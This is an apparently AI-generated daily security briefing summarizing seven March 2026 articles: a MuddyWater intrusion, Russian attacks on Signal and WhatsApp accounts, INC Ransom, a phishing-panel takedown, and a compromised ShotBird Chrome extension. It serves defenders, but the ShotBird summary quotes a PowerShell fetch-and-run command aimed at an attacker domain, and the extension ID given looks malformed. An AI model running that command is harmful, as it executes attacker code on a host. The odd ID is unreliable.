InfoSec Briefing - March 10, 2026

🚨 Critical Vulnerability Alert

We have a critical security alert. CVE-2026-1603, a authentication bypass in Ivanti Endpoint Manager, has been added to the CISA Known Exploited Vulnerabilities catalog.

🎧 Audio Briefing

Playback Speed:

Download MP3

Good morning. This is your security briefing for Monday, March 09, 2026, covering seven articles from yesterday's developments. All attribution is by the article authors. All article analysis is automated.

We have a critical security alert. CVE-2026-1603, a authentication bypass in Ivanti Endpoint Manager, has been added to the CISA Known Exploited Vulnerabilities catalog.

Huntress has published a detailed analysis of a MuddyWater attack chain targeting an Israeli company. The Iranian-linked APT group used RDP for initial access, established SSH tunnels for command and control, and deployed malware through DLL side-loading techniques with FMAPP.exe, connecting to IP addresses 162.0.230.185 and 157.20.182.49.

The AIVD and MIVD are warning about a Russian state-sponsored cyber campaign targeting Signal and WhatsApp accounts of high-ranking officials, military personnel, and civil servants globally, including Dutch government employees. The attackers impersonate Signal Support chatbots through social engineering to steal verification codes and exploit the legitimate linked devices feature, with compromised accounts appearing twice in chat groups as a key indicator of compromise.

The Australian Cyber Security Centre, CERT Tonga, and New Zealand's National Cyber Security Centre have issued a joint advisory on INC Ransom, a financially motivated group operating a Ransomware-as-a-Service model. The group has shown increased activity in Australia, New Zealand, and Pacific island states since early 2025, with a concerning trend of disproportionately targeting healthcare providers through double extortion attacks.

Security researcher Inti De Ceukelaire has published findings on infiltrating phishing panels targeting European banks including Argenta. By exploiting vulnerabilities such as localhost trust issues and accessible admin panels, the researcher tracked operators to Morocco and France, identifying technical university students in their early twenties, and contributed to taking down seven phishing campaigns targeting thousands of bank customers.

Monxresearch has uncovered a sophisticated supply-chain attack compromising the Chrome extension ShotBird, which was weaponized to serve as an initial access vector for a multi-stage malware campaign. The malicious extension displayed fake Chrome update prompts to deliver a disguised executable called googleupdate.exe, deploying second-stage payloads with credential theft and data exfiltration capabilities.

Renaud Deraison has released Bromure, a security-focused ephemeral browser for macOS that runs within disposable Alpine Linux virtual machines using Apple's Virtualization framework. Each browsing session operates in complete isolation with no persistent data, incorporating Pi-hole DNS filtering and Cloudflare WARP for encrypted traffic routing, designed for macOS 14 and later with Apple Silicon.

Finally, the Daily BlueTeamSec Briefing service has been announced as an AI-generated podcast that summarizes cybersecurity posts from the previous 24 hours. The service uses ElevenLabs, Claude AI, and Kagi Search to compile daily security briefings for the community.

That concludes today's briefing.

📰 Articles Covered

Unmasking an Attack Chain of MuddyWater | Huntress - Huntress

The MuddyWater attack chain involved an Iranian-linked Advanced Persistent Threat (APT) group gaining initial access through RDP, establishing an SSH tunnel, and deploying malware via DLL side-loading. The attack was identified in the environment of an **Israeli company** 【1】.

**What Happened:**
The intrusion began with **RDP initial access** 【1】. The attackers then established an **SSH tunnel** using the OpenSSH client, connecting to the IP address `162.0.230.185` with the username `asuedulimit` 【1】. Following this, they deployed a malicious DLL by leveraging a legitimate application, `FMAPP.exe`, to load a malicious `FMAPP.dll` 【1】. This malicious DLL was used for command and control (C2) communications, connecting back to the IP address `157.20.182.49` 【1】. The attackers exhibited some operational security flaws, including typos in commands and pauses to verify tunnel functionality 【1】.

**Who is Affected:**
The article details an incident affecting a **customer who is an Israeli company** 【1】.

**Security Implications:**
The attack chain demonstrates a sophisticated method of establishing persistence and C2 communication. The use of **DLL side-loading** with a legitimate executable allows the malware to blend in with normal system activity, making detection more challenging 【1】. The establishment of SSH tunnels can be used to bypass network security controls and exfiltrate data or maintain access 【1】.

**Technical Details:**
- **Initial Access:** Terminal Services/RDP login 【1】.
- **Tunneling:** SSH tunnel established using `C:\\Windows\\System32\\OpenSSH\\ssh.exe` to `162.0.230.185` with username `asuedulimit` 【1】.
- **Malware Deployment:** DLL side-loading technique using `FMAPP.exe` (legitimate Fortemedia Inc. application) to load a malicious `FMAPP.dll` 【1】.
- **Command and Control (C2):** Malicious `FMAPP.dll` connects to `157.20.182.49` 【1】.
- **Indicators of Compromise (IOCs):**
- IP Addresses: `173.16.10.1` (initial RDP), `162.0.230.185` (SSH), `157.20.182.49` (C2) 【1】.
- Username: `asuedulimit` (SSH) 【1】.
- Executable: `c:\\Users\\Public\\Downloads\\FMAPP.exe` (SHA256: `e25892603c42e34bd7ba0d8ea73be600d898cadc290e3417a82c04d6281b743b`) 【1】.
- Malicious DLL: `c:\\Users\\Public\\Downloads\\FMAPP.dll` (SHA256: `589ecb0bb31adc6101b9e545a4e5e07ae2e97d464b0a62242a498e613a7740b6`) 【1】.

**What Defenders Should Know:**
Defenders should be aware of the **specific IOCs** associated with this attack, including the IP addresses, username, and file hashes mentioned 【1】. Monitoring for **unusual SSH activity**, especially from `System32\\OpenSSH\\ssh.exe`, and the **execution of legitimate executables that load malicious DLLs** (like `FMAPP.exe` loading `FMAPP.dll`) are crucial detection strategies 【1】. Understanding the attacker's **workflow and playbook**, including their reconnaissance commands and C2 verification steps, can help in developing more effective detection rules and incident response procedures 【1】. The presence of typos in commands can sometimes be an indicator of manual execution by an attacker 【1】.
Rusland voert cybercampagne uit tegen Signal- en Whatsapp-accounts | AIVD - Russia launches cyber campaign against Signal and WhatsApp accounts - AIVD

A **global cyber campaign** is being conducted by **Russian state hackers** targeting **Signal and WhatsApp accounts** 【1】.

**What Happened:**
The attackers are impersonating Signal Support chatbots to trick users into revealing verification and PIN codes. They are also exploiting the "linked devices" feature within these messaging applications 【1】. This campaign is not exploiting technical vulnerabilities within the apps themselves but rather abusing legitimate security features 【1】.

**Who is Affected:**
The primary targets are **high-ranking officials, military personnel, and civil servants worldwide**. **Dutch government employees** and potentially **journalists** are also identified as targets and victims 【1】.

**Security Implications:**
The successful execution of this campaign allows hackers to **read messages**, including those within chat groups, and potentially **obtain sensitive information** 【1】.

**Technical Details:**
The attackers use social engineering tactics by impersonating Signal Support chatbots. They also leverage the "linked devices" functionality, which allows users to connect their accounts to multiple devices 【1】.

**What Defenders Should Know:**
Defenders should be aware of potential indicators of compromise. These include:
- **Compromised accounts appearing twice in chat groups** with slightly altered names, such as "Deleted account" 【1】.
- **New accounts joining groups without a notification**, which can occur if a group link has been compromised 【1】.
If a group administrator is suspected of being compromised, it is recommended to **leave the group and create a new one** 【1】. The MIVD and AIVD have released Cyber Advice to help identify and counter these attacks 【1】.
bromure: Secure, ephemeral browsing in a disposable VM (macOS only) - The content posted at the URL is controlled by Renaud Deraison.

Bromure is an **ephemeral browser designed for macOS** that operates within a disposable virtual machine, enhancing browsing security by isolating sessions. 【1】

**What Happened:**
The provided information does not describe a specific cybersecurity incident. Instead, it details the functionality and purpose of the Bromure tool. 【1】

**Who is Affected:**
Bromure is designed for **users of macOS 14 (Sonoma) or later with Apple Silicon**. 【1】

**Security Implications:**
Bromure offers significant security benefits by:
- **Complete Isolation:** Browsing sessions are entirely isolated, preventing any persistent data like cookies or history from being stored. 【1】
- **Clean Environment:** Each browsing session starts in a fresh, clean environment. 【1】
- **Network Segmentation:** Network traffic is segmented, further limiting potential attack vectors. 【1】
- **Threat Neutralization:** The tool aims to neutralize threats by isolating browsing activity, making it difficult for malware or exploits to impact the host system. 【1】
- **Disposable Nature:** All data is destroyed upon closing the browser window, ensuring no residual information remains. 【1】

**Technical Details:**
- **Virtualization:** It utilizes Apple's Virtualization.framework for near-native performance. 【1】
- **VM Pool:** Instant window opening is achieved through a pre-warmed pool of virtual machines. 【1】
- **Operating System:** Lightweight Alpine Linux virtual machines are used. 【1】
- **Ad/Tracker Blocking:** Built-in ad and tracker blocking is implemented via Pi-hole DNS filtering. 【1】
- **Encrypted Traffic:** Cloudflare WARP is integrated for encrypted traffic routing within the VM. 【1】

**What Defenders Should Know:**
Defenders should understand that Bromure's core function is to **mitigate risks by isolating browsing activity**. Its ephemeral nature and network segmentation are key features that limit the potential for exploits to compromise the host system. The tool's design inherently makes it difficult for malware to persist or spread from the browsing environment. 【1】
How I infiltrated phishing panels targeting European banks and tracked down their operators - The content posted at the URL is controlled by **Inti De Ceukelaire**.

The article details an infiltration of phishing panels targeting European banks, specifically an Argenta bank scam, by the author who acted as the 'phisher' 【1】.

**What Happened:**
The author exploited vulnerabilities in the phishing panel's code, such as trusting localhost requests and easily accessible admin panels 【1】. Using tools like Burp Suite, the author spoofed an IP address and accessed session files 【1】. They also deleted malicious components like `telegramclick.php` to operate undetected and exploited a WordPress installation to gain server access by deleting `wp-config.php` 【1】. The author discovered a backup file (`argg.zip`) containing operator IP addresses from Morocco and France, and a Telegram bot API token that identified a group of four administrators 【1】. The author successfully took down seven phishing campaigns that targeted thousands of users and found evidence of the same platform being used for other European banks 【1】.

**Who is Affected:**
The phishing campaigns were targeting **customers of European banks**, with a specific mention of an Argenta bank scam 【1】. Thousands of users were potentially affected by these campaigns 【1】. The operators are described as technical university students in their early 20s 【1】.

**Security Implications:**
The infiltration revealed the **amateurishness of some phishing operations**, highlighting how easily these panels can be infiltrated 【1】. It also demonstrated the **persistent nature of scammers**, who would relocate to new domains when their panels were taken down 【1】. The ease with which sensitive information like operator IP addresses and communication channels (Telegram) could be accessed underscores significant security weaknesses in the management of these phishing platforms 【1】.

**Technical Details:**
- **Exploited Vulnerabilities:** Trusting localhost requests, easily accessible admin panels 【1】.
- **Tools Used:** Burp Suite for IP spoofing 【1】.
- **Actions Taken:** Accessed session files, deleted `telegramclick.php`, deleted `wp-config.php` to gain server access via WordPress 【1】.
- **Evidence Found:** Backup file (`argg.zip`) with operator IP addresses (Morocco, France), Telegram bot API token revealing four administrators 【1】.
- **Infrastructure:** Scammers used multiple domains and relocated when panels were compromised 【1】.

**What Defenders Should Know:**
Defenders, including **banks, law enforcement, and the security community**, need to **collaborate more effectively** 【1】. Combating phishing at scale is a significant challenge for any single organization, necessitating frameworks that facilitate collective action 【1】. Banks should be aware of the potential for sophisticated infiltration even in seemingly amateur operations and the need for robust security measures beyond basic defenses 【1】. The author also notes the legal risks associated with 'hacking back' and emphasizes that their actions were aimed at disrupting active operations to prevent victim losses 【1】.
Daily BlueTeamSec Briefing Archive - daily AI generated podcast of the last 24hours of posts - Unknown (briefing.workshop1.net operator not identified)

The provided article from briefing.workshop1.net is a daily cybersecurity briefing service that offers summaries of recent security news. However, the content available does not detail a specific cybersecurity incident, nor does it mention who is affected, the security implications, technical details, or advice for defenders. The article primarily serves as a landing page for the service, with links to past briefings and a request for financial support to cover operational costs such as ElevenLabs, Claude AI, and Kagi Search. 【1】
INC Ransom Affiliate Model Enabling Targeting of Critical Networks - Australian Cyber Security Centre (ACSC), Kingdom of Tonga's National Computer Emergency Response Team (CERT Tonga), and New Zealand's National Cyber Security Centre (NCSC)

**INC Ransom** is a financially motivated cybercriminal group that operates a **Ransomware-as-a-Service (RaaS)** model, providing its ransomware to affiliates who then target organizations worldwide. 【1】

### What Happened

INC Ransom affiliates steal sensitive data, encrypt files, and then threaten to publish the stolen data on their data leak site (DLS) to extort payment. 【1】 They have been observed targeting organizations globally, with a notable increase in activity in Australia, New Zealand, and Pacific island states since early 2025. 【1】

### Who is Affected

Organizations worldwide are affected, including those in **Australia, New Zealand, and the Pacific island states**. 【1】 The group has shown a trend towards disproportionately targeting **health care providers**, with specific incidents reported in Australia, the Kingdom of Tonga, and New Zealand. 【1】 Other sectors affected include Professional Services. 【1】

### Security Implications

The primary security implications involve **data breaches, system encryption, and significant operational disruption**. The use of double extortion tactics means that even if an organization can recover its systems, their sensitive data may still be leaked publicly. 【1】 This can lead to reputational damage, regulatory fines, and loss of public trust, particularly for healthcare organizations handling personally identifiable and medical information. 【1】

### Technical Details

INC Ransom affiliates gain initial access through methods such as:
- **Spear-phishing campaigns** 【1】
- Exploiting **vulnerabilities in unpatched internet-facing devices** 【1】
- Using **purchased valid account credentials** from initial access brokers 【1】
- **Compromised accounts** 【1】

Once inside a network, affiliates may:
- Conduct **privilege escalation** by creating admin-level accounts 【1】
- Move **laterally within victim networks** 【1】
- Use legitimate software like **7-Zip and WinRAR** to compress data before exfiltration 【1】
- Employ **rclone** for data exfiltration 【1】
- Deploy malicious files, such as `win.exe` 【1】
- Leave **ransom notes** with demands and contact instructions 【1】
- Publish exfiltrated data to their **Data Leak Site (DLS)** if ransom is not paid 【1】

INC Ransom's tactics, techniques, and procedures (TTPs) show similarities to other RaaS operations like Lynx ransomware and historical operations such as Nemty, Nemty X, Karma, and Nokoyawa. 【1】

### What Defenders Should Know

Defenders should implement the following controls to mitigate risks and enhance detection:

**Mitigating Controls:**
- **Maintain regular and tested backups:** Store backups securely and test restoration capabilities. 【1】
- **Restrict network traffic:** Use firewalls and content filters to block unnecessary services. 【1】
- **Harden remote access services:** Review VPN and remote access settings, restricting access to authorized users. 【1】
- **Restrict remote management tools:** Limit the use of tools like TeamViewer and AnyDesk to authorized administrators and monitor their activity. 【1】
- **Implement multi-factor authentication (MFA):** Prioritize phishing-resistant MFA for remote access, online services, and privileged accounts. 【1】
- **Control privileged access:** Apply the principle of least privilege, use unique accounts, and separate standard and privileged accounts. 【1】
- **Maintain robust vulnerability management:** Regularly scan for and patch vulnerabilities, especially on internet-facing services. Replace unsupported systems where possible. 【1】

**Enhancing Detection:**
- **Monitor network activity:** Watch for unusual internal scanning, brute force attempts, and unauthorized access. 【1】
- **Detect unauthorized remote access:** Monitor for suspicious use of remote access and management tools. 【1】
- **Centralize and protect event logging:** Secure logs from modification or deletion and use EDR/XDR capabilities for timely detection. 【1】
From a Sophisticated Browser-Extension Supply-Chain Compromise to a VibeCoded Twist: A Chrome Extension as the Initial Access Vector for a Broader Malware Chain - monxresearch-sec

A sophisticated supply-chain attack was uncovered, involving a **Chrome extension named `ShotBird`** that was repurposed into a malware channel after an apparent ownership transfer 【1】.

**What Happened:**
The malicious `ShotBird` extension communicated with attacker-controlled infrastructure, received and executed remote JavaScript tasks, displayed fake Chrome update lures to trick users, and captured sensitive form data 【1】. This initiated a chain of compromise that extended from the browser to the user's endpoint 【1】. In observed Windows attacks, users were prompted to download and run a file disguised as `googleupdate.exe`. This executable was a wrapper that contained a legitimate, Google-signed `ChromeSetup.exe` alongside a malicious `psfx.msi` stager 【1】. The stager then executed encoded PowerShell commands, leading to the download and execution of a larger, second-stage payload 【1】. This second-stage payload included capabilities such as Event Tracing for Windows (ETW) suppression, access to the Credential Manager, targeting of Chromium browser data, and upload functionalities 【1】.

**Who is Affected:**
The primary victims are **users who had installed the compromised `ShotBird` Chrome extension** 【1】. The attack chain specifically details a Windows file-delivery path and the use of PowerShell logging, indicating that **Windows users were the main targets** for the host-level execution phase of the attack 【1】.

**Security Implications:**
This incident highlights a significant **supply-chain risk**, demonstrating how a seemingly legitimate and trusted browser extension can be exploited as an initial access vector for deploying broader malware 【1】. The attack bypasses standard browser security measures, employs social engineering tactics by mimicking legitimate update processes to coerce users into executing malware, and possesses the capability to steal credentials 【1】. The fact that `ShotBird` was a "Featured" extension, which typically undergoes more rigorous vetting, amplifies the concern 【1】. The compromise ultimately bridges browser-only abuse into host-level execution 【1】.

**Technical Details:**
* **Extension:** The compromised extension was `ShotBird - Scrolling Screenshots, Tweet Images & Editor`, identified by Extension ID `gengfhhkjekmlejbhpkjekmlejbhmmopegofnoifnjp` and using Manifest Version `3` 【1】.
* **Attack Flow:**
* The extension communicates with attacker infrastructure via endpoints like `/extensions/setup` and `/extensions/callback` 【1】.
* Remotely supplied scripts are used to inject fake update user interfaces and exfiltrate form inputs through `/extensions/finish` 【1】.
* The attack operates in different modes, such as `mode:file` (leading to a file download) and `mode:command` (prompting the user to copy and run a command) 【1】.
* In `mode:file`, the downloaded `googleupdate.exe` wrapper contains both a real `ChromeSetup.exe` and the malicious `psfx.msi` stager 【1】.
* The stager executes PowerShell commands, including `irm orangewater00.com|iex`, to fetch and run the second-stage payload 【1】.
* **Callback Tasks:** These include history beaconing, injecting fake update UIs, capturing user input from forms, and stripping security headers like `Content-Security-Policy` and `X-Frame-Options` using `rules.json` 【1】.
* **Infrastructure:** Fake update templates were observed hosted at `ggl.lat` 【1】.
* **Payloads:** The second-stage payload exhibited advanced capabilities such as ETW suppression, Credential Manager access, targeting of Chromium data, and data upload mechanisms 【1】.
* **Indicators:** Debug logging, `// @ts-nocheck` usage in scripts, Russian-language comments, and AI-assisted payload assembly were noted 【1】.

**What Defenders Should Know:**
Defenders need to be aware of sophisticated supply-chain attacks that exploit trusted browser extensions 【1】. The ability of these extensions to mimic legitimate update processes and facilitate host-level execution poses a significant threat 【1】. Key defensive strategies include:
* **Endpoint Detection and Response (EDR):** Implementing robust EDR solutions is critical for detecting malicious PowerShell script execution, unusual process chains (e.g., `googleupdate.exe` launching unexpected components), and suspicious network beaconing 【1】.
* **Browser Extension Management:** Enforcing policies for browser extension installations and conducting regular audits of installed extensions can help mitigate risks 【1】.
* **User Education:** Educating users about the dangers of fake update lures and the importance of verifying software sources is vital 【1】.
* **Network Monitoring:** Monitoring network traffic for connections to suspicious domains or unusual callback patterns can aid in identifying ongoing compromises 【1】.
* **Log Analysis:** Analyzing PowerShell Script Block Logging (Event ID 4104) can reveal the execution of malicious scripts, even if they are obfuscated 【1】.
* **Threat Intelligence:** Staying informed about emerging threats, such as the abuse of browser extensions and new malware delivery techniques, is essential for proactive defense 【1】.

The `ShotBird` extension was eventually removed from the Chrome Web Store after the report was published 【1】.